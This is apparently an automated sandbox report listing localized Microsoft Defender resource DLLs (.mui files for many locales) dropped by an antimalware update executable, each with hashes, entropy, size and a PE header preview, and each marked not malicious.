C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ru-RU\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	5.702175156594273
Encrypted:	false
SSDEEP:	768:7r86KELiuEXGNm+EMHr27tFPqRshDkMiCCZFft6Po6EtR1Pkn:fKFuEXpLwatFPqRoVEZ1sPontHPg
MD5:	50282BBFE6AE829BC1C71771E1BC077A
SHA1:	93F31CB94D5A1CBFD11492BDC630290C00E46A2C
SHA-256:	E40346B619EBFD886FD2C765C2191FAE7B553579A1EFB39E295C87B039D56B94
SHA-512:	A88B65D2B3D9E1AEAC58E0AE2EBA23D882C284759B191C077ACBAC33BFC76B3DCA6537B18E52305207A6D0898E9DCF391B68E25A27EB0B83EA31B5B17F275325
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..<................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ru-RU\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.439190532025138
Encrypted:	false
SSDEEP:	384:7rzjKnrnsDWWNc4ZGYwZPWS8/WcRDBRJZXjlGsuiO:7rvH1xR1PZwh
MD5:	2E018CA3A3454FF784BB17F1145B4650
SHA1:	2AA6B8B8CF60F912B967E3D42B73F599B4833CF6
SHA-256:	72D1DA6C2467D00608C92B86429B7A2DB372C6713B88E4F8E61E0FC528005BAF
SHA-512:	64CA5F60B0219BB8858C79B8B408408EE1D945BBB01B8EB02A6A20E9CDD2C5C1048557FCA80971DD97F1292FCEB711A62A48EF089C1BE3A7BC74282D11322707
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p......>.....@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sk-SK\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64744
Entropy (8bit):	4.398797977463382
Encrypted:	false
SSDEEP:	1536:mvDa4ow8Jw95U/xZjJKneDUCi4gWgQEpfhhy3HP4s:mDJow8Jw950xZjJOQEpu3l
MD5:	D27C1603DDD3C0C0CBB820063A60196B
SHA1:	1CD876564901474694053DF04EF4C44EE25D096F
SHA-256:	0E89422405CB31189A3E65E2CBB2268015EEC9CF6EBDF8729A217284275B7705
SHA-512:	9B1C56E4C06BAFBA9AC8B053C92CFA68E4BDC19693E5E2DA9F58F36EF0AD2A6C62FC30E5CF81A0C91FCA5DDC75BFC7F5C270B8A64BE61202A8096571D67A4041
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................=.....@.......................................... ..T................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sk-SK\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.124727163720533
Encrypted:	false
SSDEEP:	768:7r2yJU2JnI75kjnitABfH4JK9hKHnE6gs3R1Pt5i3:OXmC5kjnitABfH4JK9hKHnENs3HP/W
MD5:	92664A84B358EAD0F5513B00F403B8FA
SHA1:	ACBC604697C3167ECF87A59E567B8115DA69C76E
SHA-256:	115E15FF95B7140A5A7FAEC9D87298EE7FDBE65A35BB87497FCCB6B5BF236D6F
SHA-512:	B9E237F9E705365740FBAF987C23E0CFA91A741BFF1CC8798FBACCC1AC14000645CA83D4EA976AF9910F2A3F7F4FBF2D64D0632F5A039A68A4A78420FB6A1887
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........J...............................................p......og....@.......................................... ...G...........L... ...........................................................................................rdata..p...........................@..@.rsrc....G... ...H..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..HC...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sl-SI\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	65256
Entropy (8bit):	4.214949187090915
Encrypted:	false
SSDEEP:	1536:U+Vv0SEEyDZoCxo861MkJ+mzxsrts0mXBZtklS9T1VksHPyg:U4vKEy1oCxo5Dxsrts0mXBZtklMT1VkW
MD5:	100089A25524739BC2285AE5DF1D5EC6
SHA1:	32444E85B9523F866B1CE415E8D3FCE5F0B8340F
SHA-256:	63B78C5A175AB9022A40E361D8F0677D6DC272C62251987C3BB0100F064FD8DE
SHA-512:	B5297B46557F61469FA3DAAB40F58DC2B29FD5B2B90F6B144FEF85C43743FE2450CC3F678FDB3BCE55DAF51E32D046478D217CE94884DBF00730B64C951ECCBF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.....................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sl-SI\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.086393714763639
Encrypted:	false
SSDEEP:	384:7rMtnvjgBF+SVEAeMFwjCDUDtPINUiD8id7DWS8/WcRDBRJTC4UslGsVi:7r2+4xR1Pgd
MD5:	3CD9903B2FE11BE4B57D6B1CE74AA1EF
SHA1:	354827DDE1A64486729077C8B21D0A47A3C5B0C7
SHA-256:	E289488BA8E975B6B3D1B6702A7AFDAE17ACFF00242C46552D1FE205C6C42E22
SHA-512:	702DEF25CD5394BF4CD697A86270A648D9304757E3FF559E53C3FE3C2B4EFE87338172728FAF9617B7739FFF76CF1982FF5D959BF5AE77E3C5FB19CCA26CC1A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p...........@.......................................... ..TJ...........P... ...........................................................................................rdata..p...........................@..@.rsrc...TJ... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...E...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sq-AL\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	4.999669719868346
Encrypted:	false
SSDEEP:	768:7rR5OWAVCKUmuBK9hxMPJNFq1iKSS6R1PDa8zC:m6HPDaiC
MD5:	B732F58E778DB9EDFBF0401DE3C711EC
SHA1:	2091F6702B872D4A9283DE1ECEE8F11CA51B5CE9
SHA-256:	329D1D3BC2595E79D0FE6DA2702A29D374DCE86292EAB05AE10DF437603281F7
SHA-512:	B178A91C6C8909D05716E39BAAF1BE098A34308A0EA731C40A612C9EE45C34FA7BF0AD03588A4864399AACC9F64786D67F9E30825CE3B28B1BABB7C8218D7BB0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sr-Cyrl-BA\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28904
Entropy (8bit):	5.383393719842664
Encrypted:	false
SSDEEP:	384:7rZt+CIQqOqBS3KJdr8pqkWS8/WpqRDBRJsOJX7aJdlGslGi:7rvoS3gpTxR1PsI7aJGw
MD5:	667AA5FF4EFEA149C26082BCBEC21B47
SHA1:	FC2565B75E774F8BBB62B8E8D78F13D3D2551FB8
SHA-256:	42C9A56A116B48A5AB9D1249B0601D09EBA8D6830B870286E3C096422120C4F4
SHA-512:	CD9BA7975F2496B94B565D5C126E64581799DC4C806E5FE5C52E7A27EB244C8F6F0E18143D8282C588DBBD27319250CFCF83E0AF62217C623CF2A8C25012988B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..0G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sr-Cyrl-RS\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	5.406408685107551
Encrypted:	false
SSDEEP:	384:7rDMVH6EVxGq6qlO6qnWS8/WuRDBRJvn6VslGsJf:7roEENLvR1P8U
MD5:	DA0FB5E9E66DCB221D02970587884CBD
SHA1:	182551B8E1601C0BD5719E69DAF7166BA8B11A4C
SHA-256:	16409B0BD47BC94250526CBF7EDF57F1AE6E163D7BC31E0FCB87C7E3350A5B1B
SHA-512:	251575C9B2445BEDCC418D45FE189A3DA1461AB4C18E79E151440F4AA068FFA416470640F8955B5AB5031A890792A63DB9FC56AA7C2B78B092662DECDFF9C3C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........P...............................................p.......'....@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sr-Latn-RS\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	64232
Entropy (8bit):	4.243489404592018
Encrypted:	false
SSDEEP:	768:7razXLgQmnYzHvioLp1eqR+cLdcfnR1P/6Lg:IX0QmnYzHZp1eqEnHPik
MD5:	172E4AEF12DFC1BBEB9725A42A0DA59F
SHA1:	51AB8E81321327A71682EDFF9800CA32FC9E9E7F
SHA-256:	41BA0615BD5ECFDD5940C81D5D4CDD24FB2452237F164ADB7FC6FCE3AC2E0186
SHA-512:	D15964730C01F6AFB9F8C3AB981AC06C9701B7CE04448CF7D55F09B2857776DBF07696BBF2661050B0BF69C0D93407C839345DBDF616E0422D52186E18F14769
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................l.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sr-Latn-RS\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29432
Entropy (8bit):	5.036012315073581
Encrypted:	false
SSDEEP:	384:7rFyqv1y9IgLEnplhQyFq08pimCqY2AReYGYnA7bL/WS8/WWRDBRJfl5RE:7r69lLyC/AJGYiw3R1PBE
MD5:	5915C3DC6D3404A660F0ED04D9D0CA09
SHA1:	F7C49A18AC6BEADA85E30907C25503E3B1DC69F8
SHA-256:	3AF72E307F61020CFB0B24378EEF5D8A546E8097A547F1399252883ABFE2D552
SHA-512:	966E52E78569A225BE9308A54AA1D666C78AC24B2CCE764AE799D93168C3C89A54B901C5EF963115B02F717C41246ADFC0E0F9E50E381AE8D7CF2357348FF1AC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........P...............................................p......A)....@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sv-SE\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	62184
Entropy (8bit):	4.260424010953516
Encrypted:	false
SSDEEP:	384:7rS5H/svb8FrKgdUEBg+b4DDiJv1XwTGUm1TZ86KPPpnfj9uBZzLp1/xPYb7+EWh:7rhbu62JzC202kNt2R0FR1Pby
MD5:	F98760FC587DDD6A9F74ACC580D3EBD6
SHA1:	49824BA8D5AD02D0A6340B1FFE65D07EC3D56B32
SHA-256:	2D61497309D01463A866DF853E2BE71EFC44EC7AE10D1D7C23EABFB39D4DF852
SHA-512:	76D379AD2A80A542E1238C88B53AD9AA0268E9A47E7E73FEF059C7D1BAE6DB887B52BB1B2FB786822D8C828E753A96554B32CDE8F197E5C2442A5B0BBE614DE0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................['....@.......................................... ..D................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sv-SE\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52472
Entropy (8bit):	4.468075555692661
Encrypted:	false
SSDEEP:	384:7rfsVHTjfXBM/6evcf+0fwuWt1wgwZumtjcLg3mb8qIpBJVaKfPx40YnK8WZvRD3:7rkVed0YKDvR1Pumzb
MD5:	96FB7CA817E3C5DAFFEBDFEC7D84A518
SHA1:	A23105F318C2DF6DC635C3352C19AB54B0001989
SHA-256:	35AE2935EC38672E29A09E85FEDF04B6698D5A0EF6DB3935825417DB01D09501
SHA-512:	7BAF8C65F578ADD8C1A3FC9FC993F99FE368F9C2BE353DB5CA7E96A894A9284D4BC89736E6D44E82AAA58B1EA7057767B2FA4BC5BC5DE62908B34CABEA69092F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................#.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\sv-SE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28392
Entropy (8bit):	5.050071074505688
Encrypted:	false
SSDEEP:	384:7rAfo6C/92PFcydIw/lb6rZlhS8N5ClKHTJSzK8TEOWS8/WNRDBRJfVnlGsLeE:7rPEFcy3bg8wL4R1PfuBE
MD5:	82C9C6174E08258BBE12FDAE6A21254D
SHA1:	D05986CD67A1FE9CEC02212887C800C2791E7861
SHA-256:	FD0D9CF27F78F3A14711959F2DF8CD2425DB148394A92EA5B93E46DD23B1CE37
SHA-512:	7275DAA98E33FB396AC96A2F3B103C8CDB895E8AA153F6BCBDE7195EAC5C54111FD1566854FE3C5302F6AA20455F7B8A58448341DBB50DE93E58B1EF411BE61B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........L...............................................p......l.....@.......................................... ...I...........N... ...........................................................................................rdata..p...........................@..@.rsrc....I... ...J..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..PD...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ta-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30968
Entropy (8bit):	5.4273708118083555
Encrypted:	false
SSDEEP:	768:7rq1T0WjvpLKbsYAYqYBAVs5sBsZgJ93XCjr741R1PGYz:ml1HPGW
MD5:	5643685F146F6D3FE21A20D48ADB152F
SHA1:	64925A7A019936FAF22A6CF9BF6C7541484032AD
SHA-256:	95A564843D4545EFFC97B6E82102D4DC68959400C2B791F64D3361031AD709A7
SHA-512:	637EA7BF0343087906AB4B77093D83D49E2ED4C91E975BBD7892C198C15136535791BFD7B6663413904FFF3628D89102DAA02837140194171C2DB849AD3FD69A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........V......................................................^.....@.......................................... ...S...........X... ...........................................................................................rdata..p...........................@..@.rsrc....S... ...T..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...N...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\te-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	5.48493902759846
Encrypted:	false
SSDEEP:	384:7r26t4yFKK7zvVFghf/YPO98cWDxWE3J8A+E5WS8/WSRDBRJM6Tl5D:7rNoK77fghfLXyJ8A+fbR1P1H
MD5:	B48495672B8C2953E207915CC937FE09
SHA1:	F742494BC50273C5097B72058EE08A8CAB45A4AE
SHA-256:	AB35CB5076BE4D422C979227A2A53F28CF0BEE720F177AB0F5BEBB7A2D94B93E
SHA-512:	6366F91868F635BBF598690516CC266FCD3AA59E43D1E7136D5549625688DE7018E726E2C98B701D062D6537C0FB9311C2821DE254CCF993960ECAE347EF5356
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........N...............................................p...........@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\th-TH\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	58600
Entropy (8bit):	4.932827342799843
Encrypted:	false
SSDEEP:	768:7rhmpTuOhSEpABSrX1+kkjqyyh7wBgNR1PwdC:JgTjhSEpABSrX1HyyBwBgNHPwdC
MD5:	7B0C4FD9826AD7EB0E9486581E8CA50A
SHA1:	485B1E922C4EF44300B9FDEEA011191BAEF90C50
SHA-256:	466DA97CB1ACE2FDB0640D14985F7D609BD200CFAC489145EAF12180C8140579
SHA-512:	6363578BA36CCB16E3048CB04F241994EC21AD1658F1D272628E5AF55D5FF3C29AEDAC9163086897CABFDEE41A7394ABF7FBDF5667E33BE27C3B9F5299E4926F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.................................................................X....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\th-TH\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26360
Entropy (8bit):	5.676517840611638
Encrypted:	false
SSDEEP:	384:7rsl1fofHWjWZiB743/EsxDZF7WS8/WtRDBRJpTql5eY:7rENofHWjWZ3/DxD4QR1Pp+
MD5:	19FBFBC2D7C95B8580A4C38A5B4DBFA5
SHA1:	FD442FC831083BBF02F443C425D8976103985CB8
SHA-256:	447674122E4A5E67132BEDBE0E9FC383B04C3A8766A77FC7106758E3847D29E0
SHA-512:	641D4FDF5BA440B3D7AC2107D036C970778B62B57233EB3D71EE02916A79B30E8C117CD5A08ED5C879A59BD73D7EA935A975C7FFC10B91ED945FE4BC19D7E71D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!.........D...............................................p......9.....@.......................................... ...A...........F... ...........................................................................................rdata..p...........................@..@.rsrc....A... ...B..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..P<...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\tr-TR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63208
Entropy (8bit):	4.418620962428412
Encrypted:	false
SSDEEP:	1536:qpiS0H2w3jUjlRhTNfLzbTJ6djMfqirb4QfT1DsHXBcxii5MVhMIeXpquWvuHPT0:6/0H2w3jUjlRhTNfLzbTJ6dEfT1DsHX1
MD5:	40287708A40088B80943086E910F6D2D
SHA1:	0D7A9085E4013E8D420981D5B8D731AA9F0E654F
SHA-256:	80364521D699C22083CD4BABE754DD98D4897F22CBE2D658E1605A5558064BF6
SHA-512:	00916D805AE437B50F8B291C5ADEA09834890A6A950154DB113224B0C66C155272EA143C4A6986A88C29FBE671750A591CF38BA8A581546E29FA759783971529
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..x................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\tr-TR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53496
Entropy (8bit):	4.582737370755786
Encrypted:	false
SSDEEP:	768:7rXIuB6GMNfvYOsuMtVynuXqRXcM/YHoKvOzSW0FaG4VCunMd25r+7nhk52VoO30:vIuB6BNfUuSW0XuMd2eu+VHP9NS
MD5:	72793569DA2104C377C013B7FF0DC4AA
SHA1:	4CD44FF142BB6A86324B13A17C3859179A23669B
SHA-256:	AAA4B1E8BDA6A3CDED4D7BDDB69277EE7D5596453EE4667DF0275AAED5ABC059
SHA-512:	10D4F107355C21C1DBE49663CCCADC2F4B57598EFAD52323896AC4EB502D6819AD9861B528295EFC7EFBFFC56402BC3BBE48F33B756AEFABF4F2397FF1BAA98A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................Xf....@.......................................... ..P................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\tr-TR\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27896
Entropy (8bit):	5.179178290284289
Encrypted:	false
SSDEEP:	768:7rs4z4DbcVtdyoAc1m3B/boOqKHR1Pxzax:U4z4DbcVtdyXcw3B/boOqKHHP9ax
MD5:	FE8D22F1A5E40B9B74C7DB47C7C3CAFB
SHA1:	B5DD0DB79249EA6A82EA53C95DCD59023A944436
